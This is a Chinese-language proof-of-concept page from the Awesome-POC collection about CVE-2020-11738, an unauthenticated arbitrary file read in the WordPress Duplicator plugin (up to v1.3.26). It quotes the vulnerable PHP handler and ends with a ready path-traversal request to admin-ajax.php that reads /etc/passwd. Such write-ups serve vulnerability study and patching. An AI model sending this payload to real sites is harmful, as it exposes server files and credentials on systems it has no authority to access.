admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738.md

77 lines
2.3 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
## 漏洞描述
WordPress Duplicator插件由于对文件下载没有进行验证则导致了任意文件读取漏洞
## 漏洞影响
```
Duplicator <= v1.3.26
```
## 插件名
Duplicator
https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip
## 漏洞复现
首先先查看注册的无需授权的action接口 `wp-content/plugins/duplicator/ctrls/class.web.services.php`
![](images/202205241332267.png)
这里 `wp_ajax_nopriv_duplicator_download` 对应的函数名为 duplicator_download
![](images/202205241332007.png)
```
public static function duplicator_download() {
$file = sanitize_text_field($_GET['file']);
$filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
// Process download
if(file_exists($filepath)) {
// Clean output buffer
if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
@ob_clean();
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
flush(); // Flush system output buffer
try {
$fp = @fopen($filepath, 'r');
if (false === $fp) {
throw new Exception('Fail to open the file '.$filepath);
}
while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
echo $data;
}
@fclose($fp);
} catch (Exception $e) {
readfile($filepath);
}
exit;
} else {
wp_die('Invalid installer file name!!');
}
}
```
可以看到这里接受参数 file拼接至 $filepath 中,通过调试可以得知
DUPLICATOR_SSDIR_PATH 为 wp-snapshots 目录file可控且没有过滤导致任意文件读取
```
/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd
```
![](images/202205241334750.png)
Reference in New Issue Copy Permalink